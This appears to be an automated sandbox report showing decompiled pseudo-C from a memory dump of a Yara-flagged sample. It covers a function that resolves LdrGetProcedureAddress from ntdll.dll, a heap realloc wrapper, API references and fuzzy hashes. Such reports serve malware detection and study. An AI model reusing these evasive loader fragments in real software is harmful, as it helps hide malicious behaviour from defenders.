                                                                                                        			E014621A0(void* __ecx, signed int __edx, char _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				signed int _v16;
				void* _v20;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				signed int _t22;
				void* _t24;
				short _t27;
				void* _t31;
				signed int _t37;
				signed int _t38;
				void _t40;
				signed int _t46;
				void* _t52;
				intOrPtr _t57;
				void* _t61;
				void* _t62;

				_t46 = __edx;
				_t22 =  *0x1631128; // 0x0
				_t62 = _t61 - 0x28;
				_t64 = _t22 |  *0x163112c;
				if((_t22 |  *0x163112c) != 0) {
					L3:
					_t24 = VirtualAlloc(0, 0x120, 0x3000, 4);
					_t52 = _t24;
					__eflags = _t52;
					if(_t52 != 0) {
						_t2 = _t52 + 0x18; // 0x18
						_t57 = _t2;
						E014617E0(_t57, _a12);
						asm("cdq");
						 *((intOrPtr*)(_t52 + 0x10)) = _t57;
						 *(_t52 + 0x14) = _t46;
						_t27 = E01461850(_t57);
						asm("xorps xmm0, xmm0");
						 *((short*)(_t52 + 8)) = _t27;
						 *((short*)(_t52 + 0xa)) = _t27;
						_t8 = _t52 + 8; // 0x8
						 *_t52 = 0;
						 *(_t52 + 4) = 0;
						asm("cdq");
						_v36 = _t8;
						_v32 = _t46;
						asm("cdq");
						_v20 = _t52;
						_v44 = _a4;
						_v40 = _a8;
						asm("movlpd [ebp-0x18], xmm0");
						_v16 = _t46;
						_t31 = E01461D10( *0x1631128,  *0x163112c,  &_v44, 4);
						_t40 =  *_t52;
						_v8 = 0;
						_v8 =  *(_t52 + 4);
						VirtualFree(_t52, 0, 0x8000);
						__eflags = _t31;
						if(_t31 < 0) {
							__eflags = 0;
							return 0;
						} else {
							return _t40;
						}
					} else {
						__eflags = 0;
						return _t24;
					}
				} else {
					_t37 = E014622B0(_t46, E01461E50(__ecx, __edx, _t64, "ntdll.dll"), _t46, "LdrGetProcedureAddress");
					_t62 = _t62 + 0x10;
					 *0x1631128 = _t37;
					_t38 = _t37 | _t46;
					 *0x163112c = _t46;
					if(_t38 != 0) {
						goto L3;
					} else {
						return _t38;
					}
				}
			}






















                                                                                                        0x014621a0
                                                                                                        0x014621a3
                                                                                                        0x014621a8
                                                                                                        0x014621ab
                                                                                                        0x014621b1
                                                                                                        0x014621e1
                                                                                                        0x014621f0
                                                                                                        0x014621f6
                                                                                                        0x014621f8
                                                                                                        0x014621fa
                                                                                                        0x01462208
                                                                                                        0x01462208
                                                                                                        0x0146220c
                                                                                                        0x01462213
                                                                                                        0x01462215
                                                                                                        0x01462218
                                                                                                        0x0146221b
                                                                                                        0x01462223
                                                                                                        0x01462226
                                                                                                        0x0146222a
                                                                                                        0x0146222e
                                                                                                        0x01462231
                                                                                                        0x01462237
                                                                                                        0x0146223e
                                                                                                        0x0146223f
                                                                                                        0x01462244
                                                                                                        0x01462247
                                                                                                        0x01462248
                                                                                                        0x01462257
                                                                                                        0x01462263
                                                                                                        0x01462266
                                                                                                        0x0146226b
                                                                                                        0x0146226e
                                                                                                        0x01462273
                                                                                                        0x0146227a
                                                                                                        0x01462284
                                                                                                        0x0146228f
                                                                                                        0x01462295
                                                                                                        0x01462297
                                                                                                        0x014622a9
                                                                                                        0x014622af
                                                                                                        0x01462299
                                                                                                        0x014622a4
                                                                                                        0x014622a4
                                                                                                        0x014621fc
                                                                                                        0x014621fc
                                                                                                        0x01462202
                                                                                                        0x01462202
                                                                                                        0x014621b3
                                                                                                        0x014621c4
                                                                                                        0x014621c9
                                                                                                        0x014621cc
                                                                                                        0x014621d1
                                                                                                        0x014621d3
                                                                                                        0x014621d9
                                                                                                        0x00000000
                                                                                                        0x014621db
                                                                                                        0x014621e0
                                                                                                        0x014621e0
                                                                                                        0x014621d9

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000120,00003000,00000004,?,?,?,?,?,01466208,?,?,NtGetContextThread,?,?,?), ref: 014621F0
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,01466208,?), ref: 0146228F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFree
                                                                                                        • String ID: LdrGetProcedureAddress$ntdll.dll
                                                                                                        • API String ID: 2087232378-1174695804
                                                                                                        • Opcode ID: daba9033c1c6b6da970b6c987b142297e7b2ddcdd71bf2de8280dbaabaad92e9
                                                                                                        • Instruction ID: 3c8c92d7c4df8c16199c720faf1d97d1685a5a2e3d64bb7337b1d378b0c57dcf
                                                                                                        • Opcode Fuzzy Hash: daba9033c1c6b6da970b6c987b142297e7b2ddcdd71bf2de8280dbaabaad92e9
                                                                                                        • Instruction Fuzzy Hash: 1431C475E01205ABD710DF69DC41BAAF7B9FF89718F10821BE908A3210E7B1A9218BD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 014616A0, Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E014616A0(void* _a4, long _a8) {
				long _t5;
				long _t9;

				_t5 = HeapReAlloc(GetProcessHeap(), 0, _a4, _a8);
				_t9 = _t5;
				if(_t9 == 0) {
					HeapFree(GetProcessHeap(), _t5, _a4);
					return _t9;
				}
				return _t5;
			}





                                                                                                        0x014616b3
                                                                                                        0x014616b9
                                                                                                        0x014616bd
                                                                                                        0x014616ca
                                                                                                        0x00000000
                                                                                                        0x014616d0
                                                                                                        0x014616d4

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,01464D23,00000000,?,01464D23,00000000,00000000), ref: 014616AC
                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,01464D23,00000000,00000000), ref: 014616B3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,01464D23,00000000,00000000), ref: 014616C3
                                                                                                        • HeapFree.KERNEL32(00000000,?,01464D23,00000000,00000000), ref: 014616CA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                        • String ID:
                                                                                                        • API String ID: 756756679-0
                                                                                                        • Opcode ID: 6893effa246182f2bbd1a4a9b1e4977c9586002687244fbde1ea6ea86fb3d93e
                                                                                                        • Instruction ID: 830a00b03f24c42d2e95054154c98c400c49bc2beec7d99f8726482747bfbc3e
                                                                                                        • Opcode Fuzzy Hash: 6893effa246182f2bbd1a4a9b1e4977c9586002687244fbde1ea6ea86fb3d93e
                                                                                                        • Instruction Fuzzy Hash: 8CE0B6B6904214BBCB221AE5E80CA9A3E2DAB086AAB044015FA0D86234C67189208B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%